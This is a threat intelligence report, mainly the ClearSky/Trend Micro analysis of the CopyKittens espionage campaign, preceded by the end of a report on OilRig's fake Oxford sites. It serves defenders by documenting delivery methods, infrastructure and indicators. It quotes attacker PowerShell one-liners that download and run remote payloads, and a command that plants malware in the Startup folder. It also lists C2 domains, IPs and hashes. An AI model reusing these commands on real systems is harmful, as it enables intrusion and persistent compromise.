[Update 11 February 2017: In a notification in its website, Ai Squared
says that
The digital certificate used to certify newer ZoomText and
Window-Eyes software products has been compromised. As a result, our certificate will be revoked on or around
January 26th
University of Oxford impersonation
The attackers registered four domains impersonating The University of Oxford.
oxford-symposia[.]com, is a fake Oxford conference registration website. Visitors are asked to download the
University Of Oxford Job Symposium Pre-Register Tool
The downloaded file (which is also signed with an AI Squared certificate), is a fake registration tool built by the
attackers:
OxfordSymposiumRegTool.exe
f77ee804de304f7c3ea6b87824684b33
If run by the victim, their computer would get infected, while they are shown this registration process:
Note that after completing the
registration process
, the victim is asked to send the form to an email address
in oxford-careers[.]com, which also belongs to the attackers.
Previously the fake website linked to the following documents in a third fake Oxford domain, oxford[.]in:
http://oxford[.]in/downloads/ls1.doc
http://oxford[.]in/downloads/ls2.doc
http://oxford[.]in/downloads/ls3.doc
http://oxford[.]in/downloads/ls4.do
The documents were unavailable during our research, and their content is unknown to us.
The attackers used a forth domain, oxford-employee[.]com, to host an
Oxford Job application
website:
Visitors are asked to
Download CV Creator
in order
To Join University of Oxford staff
. CV Creator is a malicious
file hosted at http://www.oxford-careers[.]com/Files/OxfordCVCreator.exe :
OxfordCVCreator.exe
5713c3c01067c91771ac70e193ef5419
When run, the victim is again presented with a tool created by the attackers, this time a
University Of Oxford Official
CV Creator
Both samples mentioned in this section had the following domain used for command and control:
updater[.]li
Other incidents
In an earlier incident, the attackers sent a malicious excel file impersonating Israir, an Israeli Airline (the content of
the file was copied from the company
s public website and we have no indication of it being compromised or
targeted):
Israel Airline.xls
197c018922237828683783654d3c632a
The file had a macro that if enabled by the user would infect its computer.
In other incidents the attackers used the following files:
Special Offers.xls / Salary Employee 2016.xls
f76443385fef159e6b73ad6bf7f086d6
pic.xls
3a5fcba80c1fd685c4b5085d9d474118
People List.xls
bd7d2efdb2a0f352c4b74f2b82e3c7bc
cv.xls
72e046753f0496140b4aa389aee2e300
users.xls
262bc259682cb48ce66a80dcc9a5d587
Employee Engagement Survey.xls
726175e9aba421aa0f96cfc005664302
JuniperSetupClientInstaller.exe
f8ce7e356e09de6a48dca9e51421b6f6
Project_Domain_No337.chm
1792cdd0c5397ff5df445d73276d1a50 (undetected as malicious by any antivirus on VirusTotal )
gcaa_report_series15561.chm
d50ab63f4034c6f5eb356e3326320e66 (undetected as malicious by any antivirus on VirusTotal )
Infrastructure overlap with Cadelle and Chafer
In December 2015, Symantec published a post about
two Iran-based attack groups that appear to be connected,
Cadelle and Chafer
that
have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals
and Middle Eastern organizations
Backdoor.Remexi, one of the malware in use by Chafer, had the following command and control host:
87pqxz159.dockerjsbin[.]com
Interestingly, IP address 83.142.230.138, which serve as a command and control address for an OilRig related
sample (3a5fcba80c1fd685c4b5085d9d474118), was pointed to by 87pqxz159.dockerjsbin[.]com as well.
This suggest that the two groups may actually be the same entity, or that they share resources in one why or
another.
Indicators of compromise
Indicators file: oilrig-indicators.csv (also available on PassiveTotal)
The graph below depicts the OilRig infrastructure (click to enlarge):
Acknowledgments
This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research .
We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security
researcher Marcus, and other security researchers and organizations who shared information and provided
feedback.
Operation
Wilted Tulip
Exposing a cyber espionage apparatus
ClearSky Cyber Security
Trend Micro
July 2017
Contents
Introduction ..........................................................................................................................................................3
Targetting.....................................................................................................................................................3
Malware .......................................................................................................................................................3
Targeting ...............................................................................................................................................................4
Delivery and Infection ..........................................................................................................................................5
Watering Hole Attacks .....................................................................................................................................5
Web-Based Exploitation ...................................................................................................................................6
Malicious Documents .......................................................................................................................................7
Exploiting CVE-2017-0199............................................................................................................................7
Embedded OLE Objects..............................................................................................................................11
Malicious Macros .......................................................................................................................................15
Fake Social Media Entities..............................................................................................................................16
Web Hacking ..................................................................................................................................................19
Infrastructure Analysis........................................................................................................................................20
Domains .........................................................................................................................................................20
IPs ...................................................................................................................................................................24
Malware..............................................................................................................................................................27
TDTESS Backdoor............................................................................................................................................27
Installation and removal ............................................................................................................................27
Functionality ..............................................................................................................................................29
Indicators of Compromise .........................................................................................................................30
Vminst for Lateral Movement ........................................................................................................................31
NetSrv
Cobalt Strike Loader ........................................................................................................................32
Matryoshka v1
RAT .....................................................................................................................................33
Matreyoshka v2
RAT ...................................................................................................................................33
ZPP
File Compressor ....................................................................................................................................35
Cobalt Strike ...................................................................................................................................................36
Metasploit ......................................................................................................................................................37
Empire Post-exploitation Framework ............................................................................................................38
Indicators of Compromise ..................................................................................................................................39
Page 2 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Introduction
CopyKittens is a cyberespionage group that has been operating since at least 2013. In November 2015,
ClearSky and Minerva Labs published1 the first public report exposing its activity. In March 2017, ClearSky
published a second report2 exposing further incidents, some of which impacted the German Bundestag. In this
report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has
been active. It includes recent incidents as well as older ones that have not been publicly reported; new
malware; exploitation, delivery and command and control infrastructure; and the group's modus operandi.
We dubbed this activity Operation Wilted Tulip
Targetting
CopyKittens is an active cyber espionage actor whose primary focus appears to be foreign espionage on
strategic targets. Its main targets are in countries such as Israel, Saudi Arabia, Turkey, The United States,
Jordan, and Germany. Occasionally individuals in other countries are targeted as well as UN employees.
Targeted organizations include government institutions (such as Ministry of Foreign Affairs), academic
institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large
IT companies. Online news outlets and general websites were breached and weaponized as a vehicle for
watering hole attacks.
For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign
Affairs in the Turkish Republic of Northern Cyprus, trying to infect multiple targets in other government
organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign
affairs was used as decoy. In other cases, Israeli embassies were targeted, as well as foreign embassies in
Israel.
Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious
attachments. Fake Facebook profiles have been used for spreading malicious links and building trust with
targets. Some of the profiles have been active for years.
Malware
CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to
date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt
Strike loader; and ZPP, a files compression console program. The group also uses Matryoshka v1, a selfdeveloped RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with
similar functionality.
The group often uses the trial version of Cobalt Strike3, a publicly available commercial software for "Adversary
Simulations and Red Team Operations." Other public tools used by the group are Metasploit, a well-known
free and open source framework for developing and executing exploit code against a remote target machine;
Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, "a PowerShell and Python
post-exploitation agent." For detection and exploitation of internet-facing web servers, CopyKittens use Havij,
Acunetix and sqlmap.
A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and
for data exfiltration. This feature is available both in Cobalt Strike and in Matryoshka.
Most of the infrastructure used by the group is in the U.S., Russia, and The Netherlands. Some of it has been
in use for more than two years.
www.clearskysec.com/report-the-copykittens-are-targeting-israelis/
www.clearskysec.com/copykitten-jpost/
https://www.cobaltstrike.com
Page 3 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Targeting
Based on Trend Micro Telemetry, incident response engagements, and open source threat intelligence
investigations, we have learned of CopyKittens target organizations and countries. Its main targets are in
countries such as Israel, Saudi Arabia, Turkey, The United States, Jordan, and Germany. Occasionally
individuals in other countries are targeted as well as UN employees.
Targeted organizations include government institutions (such as Ministry of Foreign Affairs), academic
institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large
IT companies. Online news outlets and general websites were breached and weaponized as a vehicle for
watering hole attacks.
For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign
Affairs in the Turkish Republic of Northern Cyprus, trying to infect multiple targets in other government
organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign
affairs was used as decoy. In other cases, Israeli embassies were targeted, as well as foreign embassies in
Israel.
Based on the size of the attack infrastructure and length of the campaign, we estimate that there have been
at least a few hundred people infected in multiple organizations in the targeted countries.
After infecting a computer within a target organization, the attacker would move latterly using one of the
malware descried in chapter "Malware." It seems that their objective is to gather as much information and
data from target organizations as possible. They would indiscriminately exfiltrate large amounts of documents,
spreadsheets, file containing personal data, configuration files and databases.
In at least one case, the attackers breached an IT company, and used VPN access it had to client organizations
to breach their networks.
Often, victim organizations would learn of the breach due to the non-stealthy behavior of the attackers. The
attackers would "get greedy," infecting multiple computers within the network of breached organizations. This
would raise an alarm in various defense systems, making the victims initiate incident response operations.
Page 4 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Delivery and Infection
CopyKittens attack their targets using the following methods:
Watering hole attacks
inserting malicious JavaScript code into breached strategic websites.
Web based exploitation
emailing links to websites built by the attackers and containing known
exploits.
Malicious documents
email attachments containing weaponized Microsoft Office documents.
Fake social media entities
fake personal and organizational Facebook pages are used for interaction
with targets and for information gathering.
Web hacking
Havij, Acuntix and sqlmap are used to detect and exploit internet-facing web servers.
These methods are elaborated below.
Watering Hole Attacks
On 30 March 2017, ClearSky reported a breach of multiple websites, such as Jerusalem Post, Maariv news and
the IDF Disabled Veterans Organization website.4 JavaScript code was inserted into the breached websites,
loading BeEF (Browser Exploitation Framework) from domains owned by the attackers .5 For example:
Malicious code added to Maariv website
The malicious code was loaded from one of the following addresses:
https://js.jguery[.]net/jquery.min.js
https://js.jguery[.]online/jgueryui.min.js
This would enable the attackers to perform actions such as browser fingerprinting and information gathering,
social engineering attacks (like asking for credentials, redirect to another page, asking the user to install a
malicious extension or malware), network reconnaissance, infecting the computer using Metasploit exploits,
and more.6 The malicious code was served only when specific targets visited the website, likely based on IP
whitelisting.
Notably, prior to that publication, the German Federal Office for Information Security (BSI) said in a statement
that it had investigated "problems in network traffic" of the German Bundestag.7 The statement concluded
that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party in
January 2017.
www.clearskysec.com/copykitten-jpost
http://beefproject.com
https://github.com/beefproject/beef/wiki
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/CyberAngriff_auf_den_Bundestag_Stellungnahme_29032017.html
Page 5 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Web-Based Exploitation
In two incidents, the attackers breached the mailbox of a person related to a target organization. From this
(real) account, they replied to previous correspondences with these organizations, adding a malicious link to
a website registered and built by attackers: primeminister-goverment-techcenter].[tech. 8
JavaScript code, at least parts of which were copied from public sources, fingerprinted the visitor's web
browser.9 This was likely used for later browser exploitation with known vulnerabilities.
In some pages the code enumerates and collects a list of installed browser plugins, in others it tries to detect
the real IP of the computer:
Browser Plugins enumeration via JavaScipt code
Internal IP detection with Java
The data is sent to the attackers, and the victim is redirected to https://akamitechnology[.]com/.
Collected data sent to server, then redirecting to new domain
https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attackinfrastructure
https://gist.github.com/kou1okada/2356972
Page 6 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
JavaScript and Java code loaded into webpage, victim is redirected after 20 seconds
Malicious Documents
The attackers use three document based exploitation types: exploiting CVE-2017-0199, embedding OLE
objects, and macros. If the victim opens a document and the exploitation is successful (in the latter two, user
interaction might be required), the attackers would receive access to the computer via self-developed or
publicly available malware (see "Malware" chapter for more details).
Exploiting CVE-2017-0199
On 26 April 2017, a malicious email was sent from an employee account that was likely breached within the
Ministry of Northern Cyprus. It was sent to a disclosed recipients list in government institutions in several
countries and other organizations, mostly in or related to ministries of foreign affairs. We should note,
however, that it is possible that the attackers were interested only in a few of the recipient organizations, but
sent it to a wider list because they showed up in previous correspondences in the breached account.
Recipients were in the following domains:
mofa.gov.vn
mfa.gov.sg
mfa.gov.tr
post.mfa.uz
mfa.am
mfa.gov.by
beijing.mfa.gov.il
mofat.go.kr
mfa.no
athens.mfa.gov.il
riga.mfa.sk
amfam.com
emfa.pt
mfa.gov.il
mfa.gov.mk
bu.edu
us.mufg.jp
cyburguide.com
newdelhi.mfa.gov.il
hemofarm.co.yu
mfat.govt.nz
mfa.gr
mfa.gov.lv
mfa.gov.ua
mfa.go.th
mfa.gov.bn
mfa.ee
sbcglobal.net
mfa.is
Page 7 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
The email is presented below:10
Redacted version of the malicious email sent form the Ministry of Foreign Affairs in the Turkish Republic of Northern
Cyprus
Attached to it was a document named "IRAN_NORTH-KOREA_Russia 20170420.docx".11
Content of the malicious document
The document exploited CVE-2017-0199, downloading an rtf file from:
update.microsoft-office[.]solutions/license.doc
The rtf file loads a VBA script from:
http://38.130.75[.]20/check.html
https://www.virustotal.com/en/file/521687de405b2616b1bb690519e993a9fb714cecd488c168a146ff4bbf719f87/analysis/
https://www.virustotal.com/en/file/026e9e1cb1a9c2bc0631726cacdb208e704235666042543e766fbd4555bd6950/analysis
Page 8 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Which runs a Cobalt Strike stager that communicates with:
aaa.stage.14043411.email.sharepoint-microsoft[.]co
In another case, the following document was uploaded to VirusTotal from Israel:12
"The North Korean weapons program now testing USA range.docx"
Content of the malicious document and a prompt that opens when external links are updated
It downloads an rtf document from:
http://update.microsoft-office[.]solutions/license.doc
This downloads VBA code that runs a Cobalt Strike stager from the following addresses:
http://38.130.75[.]20/error.html
Pivoting from update.microsoft-office[.]solutions, we found diagnose.microsoft-office[.]solutions, which
pointed to 5.34.181.13. Using PassiveTotal we found 40.dc.c0ad.ip4.dyn.gsvr-static[.]co. Googling for gsvrstatic[.]co, we found another sample, gpupdate.bat," which runs PowerShell code that extracts a Cobalt Strike
stager.13:
Base64 encoded PowerShell code that loads Cobalt Strike stager
https://www.virustotal.com/en/file/43fbf0cc6ac9f238ecdd2d186de397bc689ff7fcc8c219a7e3f46a15755618dc/analysis
https://www.hybrid-analysis.com/sample/1f6e267a9815ef88476fb8bedcffe614bc342b89b4c80eae90e9aca78ff1eab8
Page 9 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
The sample communicates with gsvr-static[.]co via DNS.
DNS requests performed by the sample
Yet in another case, malicious documents named
omnews.doc
and
pictures.doc
were served from the
following locations:
http://fetchnews-agency.news-bbc[.]press/en/20170/pictures.doc
http://fetchnews-agency.news-bbc[.]press/omnews.doc
The files load VBS from the following address:
http://fetchnews-agency.news-bbc[.]press/pictures.html
Which runs a Cobalt Strike stager that communicates with:
a104-93-82-25.mandalasanati[.]info/iBpa
From there, a Cobalt Strike beacon is loaded, communicating with:
s1w-amazonaws.office-msupdate[.]solutions
Page 10 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Embedded OLE Objects
In February 2017 a document titled "ssl.docx" was delivered to targets, likely via email.14 It asked the recipient
to "Please Update Your VPN Client from This Manual" [sic].
Content of the malicious document asking the victim to update the VPN Client
The "VPN Client manual" was an embedded OLE binary object, an executable with a reverse file extension:
checkpointsslvpn?fdp.exe. 15 (The "?" stands for an invisible Unicode character that flips the direction of the
string, making it look like a PDF file "exe.pdf.")16 It was composed of two files: a self-extracting executable and
a PDF.
Bundled executable and PDF files
They run via the following command:
cmd.exe /c copy zWEC.tmp %userprofile%\desktop\Maariv_Tops.pdf&© Ma_1.tmp
"%userprofile%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup"\sourcefire.pif&&cd %userprofile%\desktop&&Maariv_Tops.pdf
The PDF file is a decoy displayed to the victim during infection. It contains content copied on March 2017 from
the public website of Maariv, a major Israeli news outlet.
https://www.virustotal.com/en/file/b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d38
15dd/analysis
https://www.virustotal.com/en/file/72efda7309f8b24cd549f61f2b687951f30c9a45fda0fc3805c12409d0ba320a/analysis/
Copykittens have used this this method before, for example in a document named "mfaformann?fdp.exe"
Page 11 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Content of the malicious PDF file, copied from Maariv website
The self-extracting executable contains another executable, named p.exe, which was digitally signed with a
stolen certificate of a legitimate company called AI Squared.
Digital signature of p.exe
Interestingly, this digital certificate was used by a threat group called Oilrig.17 This might indicate the two
groups share resources or otherwise collaborate in their activity.
http://www.clearskysec.com/oilrig/
Page 12 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
The self-extracting executable serves as a downloader, running the following command:
cmd.exe /c powershell.exe -nop -w hidden -c "((new-object
net.webclient).downloadstring('http://jpsrv-java-jdkec2.javaupdate[.]co:80/JPOST'))"
The C&C server sends back a short PowerShell code that loads a Cobalt Strike stager into memory.
Base64 encoded PowerShell code that loads Cobalt Strike stager into memory
Stager shellcode with marked user agent and C&C server address
Both the docx and the executable contained the name shiranz in their metadata or file paths:
LastModifiedBy shiranz
C:\Users\shiranz\Desktop\checkpointsslvpn?fdp.exe
C:\Users\shiranz\AppData\Local\Temp\checkpointsslvpn?fdp.exe
Page 13 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
In another sample, the decoy document was in Turkish, indicating the target's nationality.18 This document
was likely stolen from the Turkish Ministry of Foreign Affairs: test_fdp.exe.19
Decoy document in Turkish
While the decoy PDF document is opened, the following commands are executed:
cmd.exe /c copy Ma_1.tmp "%userprofile%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup"\CheckpointGO.pif&& copy sslvpn.tmp
%userprofile%\desktop\sslvpnmanual.pdf&& cd %userprofile%\desktop&& sslvpnmanual.pdf
cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object
net.webclient).downloadstring('http://jpsrv-java-jdkec2.javaupdate[.]co:80/Sourcefire'))"
https://www.hybrid-analysis.com/sample/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37
https://www.virustotal.com/en/file/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37/analysis
Page 14 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Malicious Macros
In October 2016, the attackers uploaded to VirusTotal multiple files containing macros, likely to learn if they
are detected by antivirus engines.
For example, "Date.dotm" contains this default Word template content:20
A default template of a Word document used as decoy
The macro runs a Cobalt Strike stager that communicates with wk-in-f104.1c100.n.microsoft-security[.]host .
The attackers also uploaded an executable files that would run a Word document with content in Hebrew.21
Hebrew decoy document
The word document contains a macro that runs the following command:
cmd.exe /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object
System.Net.WebClient).DownloadFile('http://pht.is.nlb-deploy.edge-dyn.e11.f20.ads-youtube.
online/winini.exe','%TEMP%\XU.exe');&start %TEMP%\XU.exe& exit
In parallel, the executable drops d5tjo.exe, which is the legitimate Madshi debugging tool 2223
https://www.virustotal.com/en/file/7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb/analysis/
https://www.virustotal.com/en/file/9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb/analysis
https://www.virustotal.com/en/file/7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31/analysis
http://help.madshi.net/madExcept.htm
Page 15 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Fake Social Media Entities
Back in 2013, CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz
news, an Israeli newspaper. In the screenshot below you can see the fake profile linking to haarettz.co[.]il
(note the extra t in the domain).
"Erick Brown"24
Fake profile "Erik Brown" posting link to malicious website
"Amanda Morgan"25
Fake profile "Amanda Morgan" posting link to malicious website
The latter profile tagged a fake Israeli profile as her cousin, "
Fake profile "
https://www.facebook.com/israelhoughtonandplanetshakersphilippineconcert/posts/711649418845349
https://www.facebook.com/ynetnews/posts/548075141952763
https://www.facebook.com/profile.php?id=100003169608706
Page 16 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Who in turn tagged another fake Israeli profile as her cousin
Fake profile "
While "Erik Brown" has not been publicly active since September 2015, and the two other Israeli profiles have
not been publicly active since September 2013, Amanda Morgan is still active to date. She has thousands of
friends and 2,630 followers, many of which are Israeli. In 2015 she sent her friends an invitation to Like a
Facebook page: "Emet press."
Amanda Morgan invites its friends to like "Emet press"
Emet press (Emet means "truth" in Hebrew), is described as a non-biased news aggregator operated by Israeli
students aboard. However, the Hebrew text is clearly not written by someone who speaks Hebrew as a first
language:
Emet press Facebook page
https://www.facebook.com/jessicacohe
Page 17 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
The page re-posted news stories in Hebrew copied from online news outlets until August 2016. 28 An
accompanying website with similar content was published in www.emetpress[.]com.
Emet press website
Neither the Facebook page nor website have been used to spread malicious or fake content publicly. We
estimate that they were used to build trust with targets, and potentially send malicious content in private
messages, however we do not have evidence of such activity.
Looking at the website source code reveals that it was built with NovinWebGostar, a website building platform.
Emet press source code reveals that it was built with NovinWebGostar
NovinWebGostar belongs to an Iranian web development company with the same name.
Website of Iranian web development company NovinWebGostar
https://www.facebook.com/emetpress
Page 18 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Web Hacking
Based on logs from internet-facing web servers in target organizations, we have detected that CopyKittens use
the following tools for web vulnerability scanning and SQL Injection exploitation.
Havij: "An automatic SQL Injection tool, [which is] distributed by ITSecTeam, an Iranian security company."29
Havij is freely distributed and has a graphical user interface. It is commonly used for automated SQL Injection
and vulnerability assessments.
sqlmap: An "automatic SQL Injection and database takeover tool."30 sqlmap is an open source penetration
testing tool that automates the process of detecting and exploiting SQL Injection flaws and taking over
database servers. It is capable of database fingerprinting, data fetching from the database, and accessing the
underlying file system and executing commands on the operating system via out-of-band connections.
Acunetix: A commercial vulnerability scanner. "Acunetix tests for SQL Injection, XSS, XXE, SSRF, Host Header
Injection and over 3000 other web vulnerabilities."31
http://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/
http://sqlmap.org
https://www.acunetix.com
Page 19 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Infrastructure Analysis
Domains
Below is a list of domains that have been used for malware delivery, command and control, and hosting
malicious websites since the beginning of the group's activity.32
Domain
registration date
Impersonated company/product
israelnewsagency[.]link
26/06/2015
Israeli News Agancy
ynet[.]link
fbstatic-akamaihd[.]com
Cobalt Strike DNS
wheatherserviceapi[.]info
Cobalt Strike DNS
Generic
windowkernel[.]com
Cobalt Strike DNS
Microsoft Windows
fbstatic-a[.]space
Facebook
gmailtagmanager[.]com
Gmail
mswordupdate17[.]com
03/10/2015
Microsoft Windows
cachevideo[.]com
Cobalt Strike DNS
13/12/2015
Generic
cachevideo[.]online
Cobalt Strike DNS
Generic
cloudflare-statics[.]com
Cobalt Strike DNS
Cloudflare
digicert[.]online
Cobalt Strike DNS
DigiCert certificate authority
fb-statics[.]com
Cobalt Strike DNS
Facebook
cloudflare-analyse[.]com
Matreyoshka
Cloudflare
twiter-statics[.]info
Twitter
winupdate64[.]com
Microsoft Windows
1m100[.]tech
10/04/2016
Google
cloudmicrosoft[.]net
19/04/2016
Microsoft
windowslayer[.]in
Matreyoshka
06/06/2016
Microsoft Windows
mywindows24[.]in
wethearservice[.]com
Matreyoshka
11/07/2016
Generic
akamaitechnology[.]com
Cobalt Strike SSL / TDTESS
02/08/2016
Akamai
ads-youtube[.]online
Cobalt Strike SSL
Youtube
akamaitechnology[.]tech
Cobalt Strike SSL
Akamai
alkamaihd[.]com
Cobalt Strike SSL
Akamai
alkamaihd[.]net
Cobalt Strike SSL
Akamai
qoldenlines[.]net
Cobalt Strike SSL
Golden Lines (Israeli ISP)
1e100[.]tech
Google
ads-youtube[.]net
Youtube
azurewebsites[.]tech
Microsoft Azure
chromeupdates[.]online
Google Chrome
elasticbeanstalk[.]tech
Amazon AWS Elastic Beanstalk
microsoft-ds[.]com
Microsoft
trendmicro[.]tech
Trend Micro
fdgdsg[.]xyz
03/08/2016
Generic
microsoft-security[.]host
Cobalt Strike SSL
09/08/2016
Microsoft
Ynet Israeli news outlet
04/09/2015
Akamai
Microsoft Windows
Some have been reported in our previous public reports
Page 20 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Domain
registration date
Impersonated company/product
cissco[.]net
Cobalt Strike DNS
29/08/2016
Cissco
cloud-analyzer[.]com
Cobalt Strike DNS
Cellebrite (?)
f-tqn[.]com
Cobalt Strike DNS
Generic
mcafee-analyzer[.]com
Cobalt Strike DNS
Mcafee
microsoft-tool[.]com
Cobalt Strike DNS
Microsoft
mpmicrosoft[.]com
Cobalt Strike DNS
Microsoft
officeapps-live[.]com
Cobalt Strike DNS
Microsoft
officeapps-live[.]net
Cobalt Strike DNS
Microsoft
officeapps-live[.]org
Cobalt Strike DNS
Microsoft
primeminister-goverment-techcenter[.]tech
05/09/2016
Israeli Prime Minister Office
sdlc-esd-oracle[.]online
09/10/2016
Oracle
jguery[.]online
BEEF
13/10/2016
Jquery
javaupdate[.]co
16/10/2016
Oracle
jguery[.]net
BEEF
19/10/2016
Jquery
terendmicro[.]com
Cobalt Strike DNS
12/12/2016
Trend Micro
windowskernel14[.]com
20/12/2016
Microsoft Windows
gstatic[.]online
28/12/2016
Google
ssl-gstatic[.]online
broadcast-microsoft[.]tech
Cobalt Strike DNS
newsfeeds-microsoft[.]press
Cobalt Strike DNS
Microsoft
sharepoint-microsoft[.]co
Cobalt Strike DNS
Microsoft
dnsserv[.]host
Generic
nameserver[.]win
Generic
nsserver[.]host
Generic
owa-microsoft[.]online
Microsoft Outlook
owa-microsoft[.]online
Cobalt Strike DNS
Microsoft Outlook
gsvr-static[.]co
13/02/2017
Generic
winfeedback[.]net
Cobalt Strike DNS
28/02/2017
Microsoft Windows
win-update[.]com
Cobalt Strike DNS
intelchip[.]org
Cobalt Strike DNS
ipresolver[.]org
Cobalt Strike DNS
Generic
javaupdator[.]com
Cobalt Strike DNS
Generic
labs-cloudfront[.]com
Cobalt Strike DNS
Amazon CloudFront
outlook360[.]net
Cobalt Strike DNS
Microsoft Outlook
updatedrivers[.]org
Cobalt Strike DNS
Generic
outlook360[.]org
Cobalt Strike DNS
Microsoft Outlook
windefender[.]org
Cobalt Strike DNS
Microsoft
microsoft-office[.]solutions
gtld-servers.zone
Cobalt Strike SSL
Root DNS servers
gtld-servers.solutions
Cobalt Strike SSL
Root DNS servers
gtld-servers.services
Cobalt Strike SSL
Root DNS servers
akamai-net.network
azureedge-net.services
Microsoft Azure
cloudfront.site
Cloudfront
googlusercontent.center
Google
Google
18/01/2017
Microsoft
Microsoft Windows
01/03/2017
23/04/2017
01/07/2017
Intel
Microsoft
Akamai
Page 21 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Domain
registration date
Impersonated company/product
windows-updates.network
Microsoft Windows
windows-updates.services
Microsoft Windows
akamaized.online
cdninstagram.center
netcdn-cachefly.network
Akamai
01/07/2017
Instegram
CacheFly
Noteworthy observations about the domains:
Domains impersonate one of four categories:
Major internet and software companies and services
Microsoft, Google, Akamai, Cloudflare,
Amazon, Oracle, Facebook, Cisco, Twitter, Intel
Security companies and products
Trend Micro, McAfee, Microsoft Defender, and potentially
Cellebrite
Israeli organizations of interest to the victim
News originations, Israeli Prime Minister Office,
an Israeli ISP
Other organizations or generic web services
The attackers always use Whoisguard for Whois details protection.33
Domains are usually registered in bulk every few months.
Long subdomains are created like those used by Content Delivery Networks. For example:
wk-in-f104.1e100.n.microsoft-security[.]host
ns1.static.dyn-usr.gsrv01.ssl-gstatic[.]online
c20.jdk.cdn-external-ie.1e100.alkamaihd[.]net
msnbot-sd7-46-194.microsoft-security[.]host
ns2.static.dyn-usr.gsrv02.ssl-gstatic.online
static.dyn-usr.g-blcse.d45.a63.alkamaihd[.]net
ea-in-f155.1e100.microsoft-security[.]host
is-cdn.edge.g18.dyn.usr-e12-as.akamaitechnology[.]com
static.dyn-usr.f-login-me.c19.a23.akamaitechnology[.]com
pht.is.nlb-deploy.edge-dyn.e11.f20.ads-youtube[.]online
ae13-0-hk2-96cbe-1a-ntwk-msn.alkamaihd[.]com
be-5-0-ibr01-lts-ntwk-msn.alkamaihd[.]com
a17-h16.g11.iad17.as.pht-external.c15.qoldenlines[.]net
Some of the domains have been in use for more than two years.
http://www.whoisguard.com/
Page 22 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Often the attackers would point malicious domains to IPs not in their control. For example, as can be seen in
the screenshot below from PassiveTotal, multiple domains and hosts (marked red) were pointed to a nonmalicious IP owned by Google.3435
Multiple domains and hosts pointing to a non-malicious IP owned by Google
This pattern was instrumental for us in pivoting and detecting further malicious domains.
Multiple domains and hosts pointing to a non-malicious IP owned by Google
https://passivetotal.org/search/172.217.20.78
https://passivetotal.org/search/172.217.0.227
Page 23 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
The table below lists IPs used by the attackers, how they were used, and their autonomous system name and
number.36 Notably, most are hosted in the Russian Federation, United States, and Netherlands.
Country
AS name
206.221.181.253
Cobalt Strike
United States
Choopa LLC
AS20473
66.55.152.164
Cobalt Strike
United States
Choopa LLC
AS20473
68.232.180.122
Cobalt Strike
United States
Choopa LLC
AS20473
173.244.173.11
Metasploit and web hacking
United States
eNET Inc.
AS10297
173.244.173.12
Metasploit and web hacking
United States
eNET Inc.
AS10297
173.244.173.13
Metasploit and web hacking
United States
eNET Inc.
AS10297
209.190.20.149
United States
eNET Inc.
AS10297
209.190.20.59
United States
eNET Inc.
AS10297
209.190.20.62
United States
eNET Inc.
AS10297
209.51.199.116
Metasploit and web hacking
United States
eNET Inc.
AS10297
38.130.75.20
United States
Foxcloud Llp
AS200904
185.92.73.194
United States
Foxcloud Llp
AS200904
146.0.73.109
Cobalt Strike
Netherlands
Hostkey B.v.
AS57043
146.0.73.110
Netherlands
Hostkey B.v.
AS57043
146.0.73.111
Metasploit and web hacking
Netherlands
Hostkey B.v.
